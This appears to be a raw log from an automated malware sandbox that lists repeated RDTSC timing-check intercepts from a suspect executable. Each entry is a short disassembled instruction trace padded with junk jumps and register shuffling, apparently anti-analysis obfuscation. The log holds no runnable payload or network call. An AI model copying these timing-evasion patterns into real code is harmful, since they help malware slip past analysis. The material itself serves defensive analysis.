Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54707F0 second address: 5470859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F661CE75E8Eh 0x00000011 lea eax, dword ptr [ebp-04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F661CE75E8Ch 0x0000001c add si, 15F8h 0x00000021 jmp 00007F661CE75E8Bh 0x00000026 popfd 0x00000027 call 00007F661CE75E98h 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov di, BA04h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470859 second address: 547086F instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547086F second address: 54708FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 xor esi, 401BB3CEh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F661CE75E90h 0x0000001b add ax, 9448h 0x00000020 jmp 00007F661CE75E8Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a pushad 0x0000002b mov bx, 9DEAh 0x0000002f pushfd 0x00000030 jmp 00007F661CE75E8Bh 0x00000035 sub si, DE8Eh 0x0000003a jmp 00007F661CE75E99h 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54708FF second address: 5470906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470906 second address: 547091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547091D second address: 5470925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470925 second address: 547092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547092B second address: 547092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547092F second address: 5470933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470971 second address: 5470975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470975 second address: 5470979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470979 second address: 547097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547097F second address: 5470985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470985 second address: 5470989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470A1A second address: 5470A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470A20 second address: 5470A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470A24 second address: 5470A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007F661CE75E8Fh 0x0000000f pop esi 0x00000010 jmp 00007F661CE75E96h 0x00000015 leave 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, 5EF0h 0x0000001d movsx edx, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470A60 second address: 5460279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 xor ebx, ebx 0x00000015 test al, 01h 0x00000017 jne 00007F661D451437h 0x00000019 xor eax, eax 0x0000001b sub esp, 08h 0x0000001e mov dword ptr [esp], 00000000h 0x00000025 mov dword ptr [esp+04h], 00000000h 0x0000002d call 00007F662205AAC4h 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 mov bx, F7BCh 0x00000039 mov ax, dx 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F661D45143Ch 0x00000043 mov dword ptr [esp], ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ebx, 31AC48F0h 0x0000004e mov bx, 041Ch 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460279 second address: 54602BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F661CE75E8Ch 0x0000000b xor cl, 00000038h 0x0000000e jmp 00007F661CE75E8Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F661CE75E96h 0x0000001e push FFFFFFFEh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54602BD second address: 54602C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54602C1 second address: 54602C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54602C7 second address: 54602F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F661D451439h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, 7C10h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54602F1 second address: 54602F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54602F6 second address: 546032B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661D451442h 0x00000009 add cx, C058h 0x0000000e jmp 00007F661D45143Bh 0x00000013 popfd 0x00000014 mov esi, 6D10610Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546032B second address: 5460335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 69FF28A3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460335 second address: 54603C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F661D451441h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push edx 0x00000016 mov edi, esi 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Fh 0x0000001f adc ax, 91DEh 0x00000024 jmp 00007F661D451449h 0x00000029 popfd 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f jmp 00007F661D451441h 0x00000034 pop eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F661D45143Dh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54603C3 second address: 54603F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 jmp 00007F661CE75E93h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push 4E2F1739h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E8Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54603F2 second address: 5460455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661D45143Fh 0x0000000a sbb ch, FFFFFFAEh 0x0000000d jmp 00007F661D451449h 0x00000012 popfd 0x00000013 popad 0x00000014 xor dword ptr [esp], 3B863C49h 0x0000001b jmp 00007F661D45143Eh 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 jmp 00007F661D451440h 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460455 second address: 546045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546045D second address: 546052E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007F661D451447h 0x0000000c adc ecx, 1B322ECEh 0x00000012 jmp 00007F661D451449h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov esi, edx 0x0000001f pushfd 0x00000020 jmp 00007F661D451443h 0x00000025 sub ch, FFFFFFDEh 0x00000028 jmp 00007F661D451449h 0x0000002d popfd 0x0000002e popad 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F661D451443h 0x00000039 sub ax, B6EEh 0x0000003e jmp 00007F661D451449h 0x00000043 popfd 0x00000044 pushfd 0x00000045 jmp 00007F661D451440h 0x0000004a adc cx, 0E68h 0x0000004f jmp 00007F661D45143Bh 0x00000054 popfd 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546052E second address: 546057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 18h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E8Dh 0x00000014 xor cl, FFFFFF86h 0x00000017 jmp 00007F661CE75E91h 0x0000001c popfd 0x0000001d mov bh, ch 0x0000001f popad 0x00000020 push ebp 0x00000021 pushad 0x00000022 call 00007F661CE75E96h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546057C second address: 546058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 mov dh, al 0x00000008 pop ebx 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546058F second address: 5460593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460593 second address: 54605A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54605A4 second address: 54605AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54605AA second address: 54605AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54605AE second address: 54605DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F661CE75E94h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54605DF second address: 5460677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edi, 48F782F4h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F661D45143Ah 0x00000011 xchg eax, esi 0x00000012 jmp 00007F661D451440h 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Eh 0x0000001f jmp 00007F661D451445h 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F661D451440h 0x0000002b sub al, 00000038h 0x0000002e jmp 00007F661D45143Bh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov cx, D981h 0x0000003d pushfd 0x0000003e jmp 00007F661D45143Eh 0x00000043 sub si, 7498h 0x00000048 jmp 00007F661D45143Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460677 second address: 54606B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F661CE75E95h 0x00000014 and eax, 01CC5CE6h 0x0000001a jmp 00007F661CE75E91h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606B4 second address: 54606FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D451447h 0x00000008 mov ebx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [75AF4538h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F661D45143Eh 0x0000001b add ax, 4AE8h 0x00000020 jmp 00007F661D45143Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606FB second address: 5460775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661CE75E8Fh 0x0000000a and ax, 822Eh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 popad 0x00000016 xor dword ptr [ebp-08h], eax 0x00000019 jmp 00007F661CE75E8Eh 0x0000001e xor eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F661CE75E8Ah 0x00000028 pushfd 0x00000029 jmp 00007F661CE75E92h 0x0000002e adc esi, 30459208h 0x00000034 jmp 00007F661CE75E8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460775 second address: 54607E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F661D45143Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edi, si 0x00000014 mov ah, F8h 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F661D45143Bh 0x0000001f adc eax, 4DE0085Eh 0x00000025 jmp 00007F661D451449h 0x0000002a popfd 0x0000002b mov dx, cx 0x0000002e popad 0x0000002f lea eax, dword ptr [ebp-10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54607E3 second address: 5460816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F661CE75E95h 0x0000000a sub ecx, 4CE25146h 0x00000010 jmp 00007F661CE75E91h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460816 second address: 5460826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460826 second address: 5460862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e jmp 00007F661CE75E97h 0x00000013 mov dword ptr [ebp-18h], esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F661CE75E90h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460862 second address: 5460871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545041F second address: 5450423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450423 second address: 5450429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450429 second address: 545045E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 pushfd 0x00000007 jmp 00007F661CE75E8Eh 0x0000000c jmp 00007F661CE75E95h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545045E second address: 5450464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450464 second address: 54504EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E90h 0x00000008 pushfd 0x00000009 jmp 00007F661CE75E92h 0x0000000e xor cx, 6A98h 0x00000013 jmp 00007F661CE75E8Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov dl, EBh 0x00000020 jmp 00007F661CE75E90h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F661CE75E8Eh 0x0000002e adc esi, 2706AC28h 0x00000034 jmp 00007F661CE75E8Bh 0x00000039 popfd 0x0000003a movzx eax, di 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 jmp 00007F661CE75E8Bh 0x00000045 sub esp, 2Ch 0x00000048 pushad 0x00000049 push ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54504EE second address: 54505A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov cx, 5D5Dh 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007F661D451448h 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F661D451441h 0x00000018 add ah, 00000056h 0x0000001b jmp 00007F661D451441h 0x00000020 popfd 0x00000021 push eax 0x00000022 pushfd 0x00000023 jmp 00007F661D451447h 0x00000028 or ah, FFFFFF8Eh 0x0000002b jmp 00007F661D451449h 0x00000030 popfd 0x00000031 pop esi 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 push edi 0x00000036 call 00007F661D451448h 0x0000003b pop eax 0x0000003c pop edx 0x0000003d push eax 0x0000003e push edx 0x0000003f call 00007F661D45143Eh 0x00000044 pop ecx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54505A0 second address: 54505EE instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b mov esi, 74339B75h 0x00000010 mov si, 79F1h 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F661CE75E8Eh 0x0000001b or ah, FFFFFFC8h 0x0000001e jmp 00007F661CE75E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F661CE75E95h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54505EE second address: 54505F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450606 second address: 545060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545060E second address: 5450614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450614 second address: 5450618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450618 second address: 5450665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 pushfd 0x00000013 jmp 00007F661D451446h 0x00000018 jmp 00007F661D451445h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450665 second address: 545072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007F661CE75E98h 0x00000013 or si, 4BD8h 0x00000018 jmp 00007F661CE75E8Bh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f pushfd 0x00000020 jmp 00007F661CE75E99h 0x00000025 or ax, 6376h 0x0000002a jmp 00007F661CE75E91h 0x0000002f popfd 0x00000030 popad 0x00000031 inc ebx 0x00000032 pushad 0x00000033 movzx ecx, dx 0x00000036 pushfd 0x00000037 jmp 00007F661CE75E99h 0x0000003c xor ch, FFFFFF86h 0x0000003f jmp 00007F661CE75E91h 0x00000044 popfd 0x00000045 popad 0x00000046 test al, al 0x00000048 jmp 00007F661CE75E8Eh 0x0000004d je 00007F661CE7606Dh 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545072C second address: 5450749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54508F2 second address: 54508F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54508F8 second address: 54508FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54508FC second address: 5450981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e jmp 00007F661CE75E96h 0x00000013 lea eax, dword ptr [ebp-2Ch] 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007F661CE75E8Dh 0x0000001e and cx, AC26h 0x00000023 jmp 00007F661CE75E91h 0x00000028 popfd 0x00000029 pop esi 0x0000002a mov edi, 7473A444h 0x0000002f popad 0x00000030 push ebp 0x00000031 jmp 00007F661CE75E98h 0x00000036 mov dword ptr [esp], esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F661CE75E8Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450981 second address: 5450985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5450985 second address: 545098B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 545098B second address: 54509C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661D45143Ch 0x00000008 pushfd 0x00000009 jmp 00007F661D451442h 0x0000000e or eax, 692CAA88h 0x00000014 jmp 00007F661D45143Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54509C9 second address: 54509CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54509CD second address: 54509D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
